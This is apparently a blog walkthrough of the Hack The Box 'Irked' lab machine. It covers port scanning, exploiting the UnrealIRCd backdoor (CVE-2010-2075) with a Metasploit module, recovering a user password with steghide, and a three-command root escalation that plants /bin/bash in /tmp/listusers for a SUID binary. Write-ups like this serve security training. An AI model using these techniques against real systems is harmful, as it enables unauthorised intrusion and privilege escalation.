/var/log $ cat "Hack The Box - Irked Walkthrough"

2019-04-27 | hackthebox ctf 

Machine Info

Irked Machine Info

Initial Recon

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# nmap -p- -sC -sV 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-15 15:06 CEST
Nmap scan report for 10.10.10.117
Host is up (0.043s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38556/tcp  status
|_  100024  1          44061/udp  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
38556/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.22 seconds

Own User

Enumerating Port 80

This is what we get when opening the address in our browser:

Irked Website

The source of the page is useless. Also bruteforcing files and directories with gobuster doesn’t reveal something helpful:

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
# gobuster -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.117 -x html,html,php,txt,xml,bak                                 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.117/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,txt,xml,bak,html
[+] Expanded     : true
[+] Timeout      : 10s
=====================================================
2019/04/15 15:07:45 Starting gobuster
=====================================================
http://10.10.10.117/index.html (Status: 200)
http://10.10.10.117/manual (Status: 301)
http://10.10.10.117/server-status (Status: 403)
=====================================================
2019/04/15 16:11:16 Finished
=====================================================

The ‘manual’ directory contains only the expected Apache documentation:

Apache Doc

It seems this is a dead end.

Enumerating IRC

Connecting to the IRC service it seems the box runs UnrealIRCd version 3.2.8.1:

Connecting to IRC

With this information we can search for possible vulnerabilities:

Searching for Vulnerabilities

Especially the ‘Backdoor Command Execution’ looks promising. As described in CVE-2010-2075 there was a backdoor distributed for this particular version. nmap comes with a handy script to check if the running instance does have it:

Check for UnrealIRCd Backdoor

Exploiting the UnrealIRCd Backdoor

A detail explanaition of the backdoor can be found in the posts UnrealIRCd 3.2.8.1 backdoored, investigation and Metasploitable 2 How-to - IRC Backdoor exploitation ( Metasploit & python ). Using the described Metasploit module ‘exploit/unix/irc/unreal_ircd_3281_backdoor’ we can exploit the backdoor to gain access:

Backdoor Exploitation with metasploit

Not that we’re in we spawn a shell and look where we can find the flag. Presumably it is in the home dir of ‘djmardov’:

Shell as 'ircd'

And indeed the user flag is there but we can’t access it. But there’s another file names .backup which could be helpful:

Finding '.backup'

0
1
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

We can assume that ‘steg’ is short for steganography. It seems ‘UPupDOWNdownLRlrBAbaSSss’ is the password for some data hidden inside another file. So we need to find this file. Actually the machine’s name ‘Irked’ is a hint for this.

To be honest I originally had now idea where to use the password. So after some wasted time I switched to see what else I could do within this low priv shell. And as it turned out you can go directly to root from here without getting access as ‘djmardov’ first. And this is what I did. After coming back to the box to write this I looked for some hints in the Hack The Box Forum and was finally able to figure it out. But as said you can skip this part if you like.

Getting the User Flag

The file in question is the emoticon (irked.jpg) from the website (see above). Using steghide with the password ‘UPupDOWNdownLRlrBAbaSSss’ we can extract a file named pass.txt which probably contains the password for the user ‘djmardov’:

Extracting 'pass.txt' with steghide

Switching to user ‘djmardov’ using the password ‘Kab6h+m+bbp2J:HG’ works. Now we can retrieve the user flag:

Irked User Flag

Also we can now ssh into the box with these credentials (‘djmardov:Kab6h+m+bbp2J:HG’). Or we can proceed with the shell we already have.

Own root

Using basic Linux methods for privilege escalation enumeration we can find the odd file /usr/bin/viewuser which runs with root privileges:

Finding '/usr/bin/viewuser'

Running it produces the following output:

Running 'viewuser'

I copied the file over to my Kali VM for further analysis. I’m really not good in Assembly but from what I understood the program is setting the processes UID to 0 and than executing /tmp/listusers. I’m not sure if this is the correct understanding but it was enough to gain a root shell with just three commands:

0
1
2
echo "/bin/bash" > /tmp/listusers
chmod +x /tmp/listusers
viewuser

And here’s the whole thing in action:

Irked Root Flag